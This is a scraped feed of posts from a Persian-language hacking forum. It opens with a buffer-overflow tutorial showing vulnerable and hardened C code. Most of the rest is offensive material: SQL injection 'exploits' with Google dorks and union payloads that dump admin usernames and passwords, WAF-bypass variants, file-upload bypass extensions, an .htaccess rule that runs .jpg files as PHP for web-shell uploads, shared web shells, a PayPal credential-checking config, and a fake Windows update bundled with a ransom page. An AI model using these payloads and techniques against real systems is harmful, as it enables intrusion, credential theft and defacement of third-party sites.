دریافت میکند. تابع strcpy ورودی را بدون بررسی به buffer منتقل میکند. تغییرات منجر به خرابی یا اجرای کد دلخواه میشود. gdb -q ./vulnerable (gdb) run > Enter a long input: AAAAAAAAAAAAAAAAAAA > Received: AAAAAAAAA میتوان مشاهده کرد که چگونه ورودی طولانی، باعث تغییر آدرسها در پشته میشود. مثال توابع امن: استفاده صحیح از strncpy به جای strcpy: char safeBuffer[10]; strncpy(safeBuffer, inputString, sizeof(safeBuffer) - 1); safeBuffer[sizeof(safeBuffer) - 1] = '\0'; // اطمینان از صحیحبودن پایان رشته کد نهایی عملی 🫡 /** * vulnerable.c * یک برنامه نمونه برای نمایش سرریز بافر و اکسپلویت آن * کامپایل با دستور زیر (محیط لینوکس ۳۲ بیتی): * gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c */ #include <stdio.h> #include <string.h> // تابع مخرب هدف برای تغییر جریان اجرا void hacked() { printf("\033[1;31m[!] سیستم شما هک شد!\033[0m\n"); printf("\033[1;32m[*] کاراکترهای مخرب اجرا شدند!\033[0m\n"); // اینجا میتوانید Shellcode جایگزین قرار دهید } // تابع آسیبپذیر به سرریز بافر void vulnerable_function() { char buffer[12]; // بافر با ظرفیت ۱۲ بایت printf("آدرس تابع hacked(): %p\n", hacked); // چاپ آدرس جهت کمک به اکسپلویت strcpy(buffer, "مقدار اولیه"); // مقداردهی اولیه بیخطر printf("ورودی خود را وارد کنید: "); gets(buffer); // نقطه آسیبپذیر: دریافت داده بدون بررسی اندازه printf("ورودی دریافتی: %s\n", buffer); } int main() { vulnerable_function(); printf("برنامه عادی خاتمه یافت.\n"); return 0; } 🛡️ نسخه ایمنسازی شده همان کد #include <stdio.h> #include <string.h> void vulnerable_function_safe() { char buffer[12]; printf("ورودی ایمن وارد کنید: "); // استفاده از fgets به جای gets با محدودیت اندازه if (fgets(buffer, sizeof(buffer), stdin) == NULL) { printf("خطا در دریافت ورودی!\n"); return; } // حذف کاراکتر newline (اختیاری) buffer[strcspn(buffer, "\n")] = '\0'; printf("ورودی دریافتی: %s\n", buffer); } int main() { vulnerable_function_safe(); printf("برنامه ایمن خاتمه یافت.\n"); return 0; } لینک ویدیو یوتیوب این مقاله 🧐1 امتیاز -
با تشکر1 امتیاز
-
سلام خیلی ممنون واسه مطلب هک مودم0نا100. یه سوال؟؟؟ بعد از هک این هارو(PPP UsernameوPPP PasswordوMAC Address)از کجا پیدا کنیم برای کانتک شدن. لطفا اگه امکانش هست اموزش تصویری بزارید خیلی ممنون1 امتیاز
-
با تشکر1 امتیاز
-
1 امتیاز
-
دیسکورد اکنون به کاربر امکان میدهد تا کاربران دیگر را بدون آنکه متوجه شوند، بیصدا کنید. دیسکورد راه جدیدی را برای مسدودکردن افراد ارائه داده است، بدون آنکه نیازی به رویارویی مستقیم باشد. ویژگی جدید که نادیدهگرفتن (Ignore) نام دارد، در واقع نوعی بیصداکردن (Mute) است که میتواند پیامهای کاربران مزاحم یا آزاردهنده را بدون جلب توجه یا ایجاد تنش مخفی کند. برای فعالکردن Ignore کافی است به پروفایل کاربر مدنظر بروید و روی منو سهنقطه ضربه بزنید و گزینهی Ignore را انتخاب کنید. پساز فعالسازی، دیگر پروفایل و پیامهای آن شخص را مشاهده نخواهید کرد و حضور او در سراسر دیسکورد برای شما کمرنگتر خواهد شد؛ زیرا اعلانهای مربوط به او، ازجمله پیامهای سرورها، بیصدا میشوند. تفاوت اصلی ویژگی Ignore با مسدودکردن در این است که برخلاف مسدودشدن، کاربر همچنان خواهد توانست پروفایل شما را ببیند و برای شما پیام ارسال کند. شما از آن پیامها مطلع نخواهید شد؛ مگر آنکه آنها را از حالت مخفی خارج کنید. مهمتر از همه، فردی که او را «نادیده گرفتهاید»، متوجه این موضوع نخواهد شد. دیسکورد اعلام کرده است که این ویژگی را به مجموعهی ابزارهای ایمنی خود اضافه میکند تا بهویژه به نوجوانان کمک کند بدون ترس و اضطراب از برخی افراد فاصله بگیرند. همچنین، این شرکت بههمراه OpenAI، گوگل، روبلاکس و دیگر شرکتها در حال تأسیس بنیاد غیرانتفاعی به نام ROOST است. این بنیاد قرار است فناوری متنباز برای شناسایی محتوای سوءاستفادهی جنسی از کودکان (CSAM) را در اختیار سازمانهای مختلف قرار دهد.1 امتیاز
-
با پیشرفت سریع فناوری و افزایش پیچیدگی سیستمهای اطلاعاتی، حفاظت از دادهها و سیستمها به یکی از مهمترین دغدغههای سازمانها تبدیل شده است. تست نفوذ یا Penetration Testing یکی از روشهای اساسی برای ارزیابی امنیت سیستمها و شبکههاست. این فرآیند شامل شبیهسازی حملات و تلاش برای یافتن و بهرهبرداری از آسیبپذیریها است. ابزارهای تست نفوذ به هکرهای اخلاقی این امکان را میدهند تا بهطور موثری امنیت سیستمها را بررسی کنند. در این مقاله، به بررسی جدیدترین و برترین ابزارهای تست نفوذ که در حال حاضر استفاده میشوند، خواهیم پرداخت. 1. OWASP Zed Attack Proxy (ZAP) OWASP ZAP یکی از محبوبترین ابزارهای متنباز برای تست امنیت برنامههای وب است. این ابزار به شما امکان میدهد تا حملات مشترکی مانند XSS و SQL Injection را شبیهسازی کنید. ویژگیهای کلیدی ZAP عبارتند از: محیط کاربرپسند و پلاگینهای متعدد امکان اسکن خودکار و دستی برنامههای وب پروکسی برداری برای رهگیری و تحلیل ترافیک HTTP استفاده از ZAP: برای کسانی که تازه به دنیای هکینگ وارد شدهاند، شروع با ZAP میتواند یک نقطه شروع عالی باشد، زیرا این ابزار به راحتی نصب و قابل استفاده است. 2. Burp Suite Pro Burp Suite Pro یک ابزار قدرتمند برای ارزیابی امنیت وب اپلیکیشنهاست. این ابزار امکانات گستردهای برای تحلیل و شناسایی آسیبپذیریها دارد. ویژگیهای برجسته Burp Suite Pro شامل موارد زیر است: اسکن خودکار برای شناسایی آسیبپذیریها ابزار جامع برای رهگیری و تحلیل ترافیک افزونههای قابلیت استفاده برای تستهای خاص استفاده از Burp Suite Pro: با وجود هزینه، این نسخه امکاناتی فراتر از نسخه رایگان دارد و برای حرفهایهای امنیت و تیمهای تست نفوذ ضروری است. 3. Cobalt Strike Cobalt Strike یکی از ابزارهای برتر در زمینه حملات پسانفوذی و شبیهسازی حملات تیم قرمز است. این ابزار به کاربران این امکان را میدهد تا سناریوهای پیچیده حملات را شبیهسازی و اجرا کنند. ویژگیهای اصلی شامل: امکانات گسترش نفوذ و حفظ دسترسی دسترسی به مدلهای حمله آماده ابزارهای جامع برای فرماندهی و کنترل (C2) استفاده از Cobalt Strike: ابزاری ایدهآل برای تیمهای قرمز که میخواهند مدلهای حمله پیچیدهتری را در محیطهای سازمانی آزمون کنند. 4. Empire Empire یک فریمورک برای حملات پسانفوذی است که به شما این امکان را میدهد تا بر روی سیستمهای هدف خود دسترسی را حفظ و گسترش دهید. ویژگیهای کلیدی Empire عبارتند از: ماژولهای متنوع برای جمعآوری اطلاعات و گسترش دسترسی واسط کاربری خط فرمان با طراحی کاربرپسند پشتیبانی از زبانهای مختلف برای توسعه و سفارشیسازی استفاده از Empire: این ابزار برای هکرهای اخلاقی که نیاز به انجام حملات جامع و پیچیده دارند، جذاب و حیاتی است. 5. BloodHound BloodHound مخصوص شناسایی و تحلیل مسیرهای حمله در محیطهای Active Directory است. این ابزار از گرافها برای نمایش ارتباطات و شناسایی آسیبپذیریها استفاده میکند. ویژگیهای اصلی: توانایی نمایش روابط کاربری و دسترسیها امکان تحلیل و شبیهسازی مسیرهای حمله محیط کاربرپسند برای تحلیل سریع اطلاعات استفاده از BloodHound: برای شناسایی و تحلیل شبکههای Windows AD، این ابزار بینظیر است و به سرعت به تحلیلگران امنیتی کمک میکند. 6. Metasploit Framework Metasploit یکی از مشهورترین ابزارهای تست نفوذ است که همچنان بهطور مداوم بهروزرسانی میشود. این فریمورک برای طراحی و اجرای آزمایشهای نفوذ و بهرهبرداری از آسیبپذیریها به کار میرود. ویژگیها شامل: کتابخانه گسترده از ماژولهای بهرهبرداری امکان ایجاد و تست اسکریپتهای سفارشی پشتیبانی گسترده و مستندسازی استفاده از Metasploit: به عنوان یک ابزار استاندارد در میان تحلیلگران امنیت و هکرهای اخلاقی استفاده میشود و بهطور منظم بهروز میشود. 7. Nmap Nmap یکی از اساسیترین ابزارها برای کشف شبکه و پویش پورت است. این ابزار با قدرت بالا و انعطافپذیری فوقالعادهای برای تست نفوذ بهکار میرود. ویژگیهای کلیدی Nmap عبارتند از: پشتیبانی از اسکنهای گسترده و دقیق امکان شناسایی سیستم عامل و سرویسهای فعال قابلیت سفارشیسازی از طریق اسکریپتهای NSE استفاده از Nmap: یک ابزار ضروری برای مرحله شناسایی و اطلاعاتیابی در تستهای نفوذ. 8. Wireshark Wireshark یکی از برجستهترین ابزارها برای تحلیل ترافیک شبکه است. با استفاده از این ابزار، تحلیلگران امنیتی میتوانند ترافیک شبکه را بررسی و تجزیهوتحلیل کنند. ویژگیهای کلیدی: توانایی رهگیری و تجزیهوتحلیل بستههای شبکه قابلیت فیلترگذاری پیچیده برای نمایش ترافیک مورد نظر پشتیبانی از اکثر پروتکلهای شبکه استفاده از Wireshark: ابزاری است ضروری برای هر تحلیلگر امنیتی که میخواهد به نحو مؤثری ترافیک شبکه را مانیتور کند. 9. Sn1per Sn1per ابزاری خودکار برای تست امنیتی است که فرایندهای شناسایی و بهرهبرداری را منظم و سریع انجام میدهد. این ابزار به شکل یکپارچه عمل میکند: قابلیت اسکن خودکار و نیمهخودکار توانایی شناسایی گستره وسیعی از آسیبپذیریها امکان استفاده در حالت تیمی برای جامع بودن تستها استفاده از Sn1per: برای تیمهای امنیتی که به سرعت و دقت بیشتری در شناسایی و تست نیاز دارند. 10. Amass Amass یک ابزار پیشرفته برای شناسایی داراییهای دیجیتال و جمعآوری اطلاعات درباره آنهاست. ویژگیهای کلیدی آن شامل: شناسایی و کشف شبکههای سازمان توانایی پیمایش و تحلیل گسترده زیرساختها استفاده از منابع اطلاعاتی گسترده برای تحلیل و شناسایی استفاده از Amass: به تیمها و تحلیلگران امنیتی کمک میکند تا وضعیت امنیتی جامعتری از دامنه و زیرساختهای تحت کنترل داشته باشند. خلاصه امیدوارم مفید بوده باشه و خوشتون اومده باشه و اگر دوست داشتین میتونیم توی همین تاپیک نصب تک به تک ابزار هارو بزارم واستون تا به ساده ترین روش ممکن ازشون استفاده کنید 🫡1 امتیاز
-
شل Darkness فایل اصلی و فایل دیکد شده پیوست شدند ./ dark.php dark-decoded.php1 امتیاز
-
سلام این جلسه: ارائه فیک آپدیت برای تمامی ویندوز ها + یک پیج باج خواهی کاملا ساده قسمت دوم، جلسه سوم: فیک پیج + پیج باج خواهی 8.mp4 فایل های این جلسه(guardiran.org): PAGE.zip1 امتیاز
-
نصب kali nethunter در تمامی گوشی های اندرویدی با ترموکس
arata برای farhadzeinal امتیاز داد
با سلام مشکل در ارتباط و بالا آمدن دارم.1 امتیاز -
سلام میشه کسی این آپلودر رو [Hidden Content] بایپس کنه یه فیلم بگیره من هرچی تلاش میکن نمیتونم لطفا با افزونه http live headr بایپس کنید ممنون1 امتیاز
-
سلام دوست عزیز شما میحواید بایپس یاد بگیرید یا دیفیس اگر بایپس مسخواسد بنده بهترین ایزار رو براتون میگم که یاد بگیرید burp suite واگر میخواید دیفیس یاد بگیرید همون فایل html اپلود کنید ثبت کنید و نه میخواید امنیت و راهگار یاد بگیرید سای portswigger academj حتما همه اموزش هاش رو یاد بگیرید یک امنیت کار خوب میشید اینو تضمین میکنم .نکته اخر مطلالعه کنید ممنون یا حق1 امتیاز
-
1 امتیاز
-
دوست عزیز زاهکارهای زیادی برا الو کردن در این توع میباشد برای مقال شما میتونید اخر فایلتون عدد بزنید برای مثال php6و غیره1 امتیاز
-
با سلام خدمت دوستان عزیز گارد ایران در این تاپیک برای شما تارگت های مختلف sql injection رو قرار می دم که به صورت ویدئویی هست و ضبط کردم تا بتوانید تمرین کنید لذت ببرید . 😁 لینک کانال برای مشاهده ویدئو ها : [Hidden Content] چند نکته مهم : لطفا اگر دوستی قصد ارسال پست دارد فقط به صورت ویدئویی باشد . تارگت در مورد sql injection باشد و بهتره تارگت با نکته ارائه شود . اسپم ارسال نکنید و اگر سوالی داشتید در بخش سوال و جواب ها بپرسید . و اگر پیشنهاد و یا چیزه دیگه ای بود به صورت خصوصی پیام دهید . (در این جا اسپم ارسال نشود ) تشکر 🙏 .1 امتیاز
-
سلام اول گفته باشم که از یک شل اختصاصی استفاده کنید چون فایروال شل هایی مثل الفا رو میشناسه. بایپس های مختلفی وجود داره که یک سری رو اینجا قرار میدم: .php5 .php7 .PhP .php;.png .php%00.png و همچنین میتونید header رو تغییر بدید با ابزار برپ سویت و از اون طریق هم تست کنید. اگر سرچ کنید بایپس های rfu توی یوتیوب ویدئو زیاده. موفق باشید.1 امتیاز
-
سلام، من یک وب سایت را برای آسیب پذیری اسکن کردم و برنامه یکسری آسیب پذیری با عنوان "Advanced SQL Injection - AND boolean-based blind - WHERE or HAVING clause" پیدا کرد: URL [Hidden Content] Method GET Parameter _ Attack 1') AND 3944=3944 AND ('GJLN'='GJLN *********** URL [Hidden Content] Method GET Parameter _ Attack field: [_], value [; select "java.lang.Thread.sleep"(15000) from INFORMATION_SCHEMA.SYSTEM_COLUMNS where TABLE_NAME = 'SYSTEM_COLUMNS' and COLUMN_NAME = 'TABLE_NAME' -- ] *********** URL [Hidden Content] Method GET Parameter _ Attack 1 and 0 in (select sleep(15) ) -- *********** URL [Hidden Content] Method GET Parameter _ Attack field: [_], value [(SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)] من وقتی آدرس بالا را در مرورگر می نویسم فقط یک ویدئو که در سایت وجود داره پخش میشه! چه جوری میتونم از این آسیب پذیری استقاده کنم؟ با تشکر.1 امتیاز
-
بسم الله الرحمن الرحیم اسم این ابزار urlbuster هست یکی از بهترین و قدرتمند ترین ابزارها در زمینه پیدا کردن فایل ها و فولدر های مخفی وب سایت ها است که می توانید از آن استفاده کنید و آن را در انواع سیستم عامل ها هم نصب نمایید، در آموزش fuzzing یکی از ابزارهای دیگر در این زمینه را معرفی کردهایم اما این ابزاری که در حال حاضر در حال معرفی آن هستیم یکی از بهترین آن ها است که شما به دلخواه خود می توانید یکی از این ابزارها را در تست نفوذ خود به کار ببرید و میتوانید کار با هر دو این ابزارها را تجربه کنید. آموزش نصب و استفاده از ابزار برای جستجوی فایل ها و فولدر های مخفی وب سایت برای نصب این ابزار در لینوکس می توانید آن را از گیت هاب دانلود کنید و وارد دایرکتوری آن شده و سپس فایل نصبی آن را با استفاده از پایتون اجرا کنید: git clone [Hidden Content] cd urlbuster python setup.py راحت ترین راه نصب urlbuster دستور زیر است که به راحتی با pip نصب خواهد شد: pip install urlbuster بعد از اتمام نصب شما می توانید با دستور urlbuster ابزار را اجرا کنید. نکته: این ابزار دارای امکان ست کردن کوکی و پروکسی است و همچنین با استفاده از آن می توانید ورودیها درخواست ها و موارد بسیار دیگر را بررسی کنید که بعد از اجرای آن با استفاده از سوئیچ راهنما می توانید بخش های مختلف آن را مشاهده کنید. برای آشنایی بیشتر با نحوه کار با این ابزار به دستور زیر توجه کنید، در این دستور با استفاده از سویچ w فایل ورد لیست ما که میخواهیم بروت فورس شوند را به ابزار می دهیم و سپس url مورد نظر خود را که میخواهیم وارد لیست بر روی آن تست شود را وارد میکنیم، بعد از اجرا و پایان کار ادرس فایل ها و فولدر های مخفی را اگر تشخیص داده باشد مشاهده می کنید. urlbuster -W file.txt [Hidden Content] منبع: Guardiran.org1 امتیاز
-
ساخت پیلود ساده ی php
aminweb برای Reza.Black امتیاز داد
به نام خدا سلام یک ویدیو ی ساده در مورد این موضوع تهیه کردم. Video.rar1 امتیاز -
با سلام خدمت دوستان . در این تاپیک اکسپلویت های sql injection رو میزارم برای دوستانی که به اسیب پذیری sql injection علاقمند هستند . Exploit 1 : Web Mingo I.T. Solutions - SQL Injection vulnerability ********************************************************* #Exploit Title: Web Mingo I.T. Solutions - SQL Injection vulnerability #Date: 2020-11-10 #Google Dork: "Design & Developed By Web Mingo I.T. Solutions" #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Search google Dork: "Design & Developed By Web Mingo I.T. Solutions" Demo : [Hidden Content],2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17--+ [Hidden Content],version(),3,4,5,6,7,8,9--+ [Hidden Content],2,3,4,version(),6,7--+1 امتیاز
-
[Hidden Content],2,group_concat(username,0x3a,password),4,5,6,7,8,9,10+from+administrator-- - با سلام خدمت همه اعضای گارد ایران بچه ها یکم راجب بایپس این دستور کمک کنید هرکاری میکنم نمیتونم تمام روش های تو انجمن رو هم رفتم فایروال حساس به from هستش . بایپس هایی که رفتم این ها هستند. همش ارور forbidden میده !!! /*!50000from*/ /*!from*/ /**anything**/from1 امتیاز
-
Exploit 6 : Powered by Shambhala.Travel - SQL Injection vulnerability #Exploit Title: Powered by Shambhala.Travel - SQL Injection vulnerability #Date: 2020-10-21 #Google Dork: "Powered by Shambhala.Travel" #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Search google Dork: "Powered by Shambhala.Travel" Demo : [Hidden Content],2,VERSION(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--+ [Hidden Content],2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56-- [Hidden Content],2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--+1 امتیاز
-
Exploit 2 : Designed by Launch Web Dreams - SQL Injection vulnerability #Exploit Title: Designed by Launch Web Dreams - SQL Injection vulnerability #Date: 2020-11-07 #Google Dork: "Designed by Launch Web Dreams" #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Search google Dork: "Designed by Launch Web Dreams" Demo : [Hidden Content],22222,33333,version(),55555,66666,77777,88888--&Type=Men [Hidden Content],2222,3333,4444,version(),6666,7777,8888,9999--&Type=Mask * Results are displayed in the source1 امتیاز
-
ویدئوی اول سایت مورد نفوذ : [Hidden Content] ادرس: view-source:[Hidden Content]/details.php?aid=4-6+union+select+1,2,3,4,group_concat(username,0x3a,password,0x3c62723e),6,7+from+tbl_adm_users-- خط ۹۹ در سورس ، پسورد هش شده که در ویدئو کرک هم می کنیم . اگه کیفیت پایین هست به این لینک مراجعه کنید : [Hidden Content]1 امتیاز
-
Paypal API Config (New) Soft:OpenBullet Proxy:Need Bot:150 Paypal.anom1 امتیاز
-
درود، احتمالا نیاز به بایپس WAF دارید متود های زیر رو تست کنید: +ORDER+BY+99999 +/*!13337ORDER*/+/*!13337BY*/+99999 +/*!50000ORDER*/+/*!50000BY*/+99999 +OrdER+bY+99999 اخر هرکدومشون هم کاراکتر های زیر رو بزارید: -- - -- %23 به طور مثال +OrDEr+bY+99999 -- -1 امتیاز
-
یک شل برای دور زدن آپلودر عکس که به سایز تصویر گیر میده [Hidden Content] اینم پست دوست خوبم rex که آموزش آپلود شل در انواع سی ام اس رو آموزش داده [Hidden Content]1 امتیاز
-
[Hidden Content] یه شل با فرمت jpg براتون میزارم که آپلودرهایی که به اندازه عکس و این چیزا گیر میدن رو بایپس میکنه ولی برای اینکه خودش به صورت jpg هم بتونه اجرا بشه باید این کد رو داخل .htaccess بزارید و اپلود کنید 😐1 امتیاز
-
دیفیس های ثبت شده در aljyyosh.org , zone-deface.com
peymanketab برای proxy امتیاز داد
[Hidden Content]1 امتیاز -
یه شل با فرمت jpg براتون میزارم که آپلودرهایی که به اندازه عکس و این چیزا گیر میدن رو بایپس میکنه ولی برای اینکه خودش به صورت jpg هم بتونه اجرا بشه باید این کد رو داخل .htaccess بزارید و اپلود کنید 😐 <FILESMATCH "^.*/.jpg"> SetHandler application/x-httpd-php </FILESMATCH> shell.rar1 امتیاز
-
شل.rarبا سلام نزدیک ده تا شل پر کاربرد برای شما اماده کردم ا میدوارم خوشتون بیاد1 امتیاز
-
باسلام به همه دوستان دوست عزیز در شرکت های بزرک میان در ایکس چنج سرور یه کاری میکنن البته ینده تارکت شمارو ندیدم و بصورت کلی میگم که این چنین هم میشه مثلا دانشگاهی که خود بنده .... احتمالا شما با چنین سرورهایی برخورد کردید چون بنده با دوست عزیز 1tedروی سروری کار میکردیم برای یک سازمان پزوهشی بود که اسکیوال داشت و ما کیه کاربرانو در اوردیم بجز ادمین که بعدا فهمیدم زیرساختشون این چنین بوده شما میتونین با جمع اوری اطلاعات دقیق از سرور بفهمید که ایا یوزر ادمین در داخل یکی از اون تیبل هاس یا در یک سرور دیکه قرار داره باز یادم رفته بود اکه با ابزارهای تزریق خوب کار کرده باشید با همونا میتونید مستقیم یک اپلودر یا شل اپلود کنید1 امتیاز
-
سلام مدير انگار كم اورد لااقل شما يه كم توضيح بدين . من كه گفتم دوتا خط با دوتا مودم دارم پس نشون ميده كه از يه isp اكانت دارم . اتفاقا براي هك نميخوام من قبلا يه سيستم داشتم كه مثل دوربين مدار بسته از راه دور استفاده ميكردم و لي يه مدتي هست كه نميشه . لطف راهي بهم نشون بدين كه بتونم استفاده كنم . اين كه بگين من بيشتر توضيح نميدم يعني چي ناسلامتي اينجا انجمن هست . براي بالا بردن سطح علمي درست كردن نه اين كه بيان الكي يه چيزي هايي بگن و هي فيلم بزارن براي دانلود و اخرش تو عمل همش اشتباه باشه . اگه هم بلد نيستين راحت بگين بلد نيستيم و اگه نميخوايين به كسي چيزي ياد بدين پس چرا مياين انجمن كه بگين من ديگه چيزي نميگم . لاقل يه لينكي چيزي بزارين ...... و اينم مطمعن باشين كسي كه مياد انجمن سوال ميكنه حتما قبلش همه جا ها را رفته و سرچ كرده وبه جايي نرسيده . والا منم ميتونم بيام از اين انجمن ها بزنم كه به كسي جواب ندم كاري نداره1 امتیاز
-
با سلام دوستان این اموزش به در خواست یکی از دوستان گلم ضبط شده است. عده ای به این باگ rom-0 هم می گن. این باگ خطرناک هستش و اکثریت مودم های adsl این باگ رو دارند. اگر از هک مودم های adsl هیچ اطلاعی ندارید پیشنهاد می کنم به این صفحه نگاهی بیندازید: [Hidden Content] در اموزش بعدی نحوه دیباگ کردنش رو قرار میدم. پسورد فایل ها: guardiran.org zynos.part1.rar zynos.part2.rar تشکر نشانه رضایت شماست1 امتیاز
-
1 امتیاز